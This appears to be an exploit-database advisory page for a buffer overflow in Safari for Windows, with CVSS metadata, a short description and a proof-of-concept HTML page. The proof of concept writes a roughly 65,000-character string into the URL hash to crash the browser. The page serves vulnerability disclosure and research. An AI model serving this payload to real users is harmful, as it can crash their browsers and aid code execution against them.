header-logo
Suggest Exploit
vendor:
Safari for Windows
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
Unknown
CWE
Product Name: Safari for Windows
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Buffer Overflow in Safari for Windows

The vulnerability is a buffer overflow that occurs when a user views a maliciously crafted webpage. By enticing a victim to view the webpage, a remote attacker can execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26448/info

Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.

A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 

<html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html>

Navigation

Suggest Exploit

Services By CQR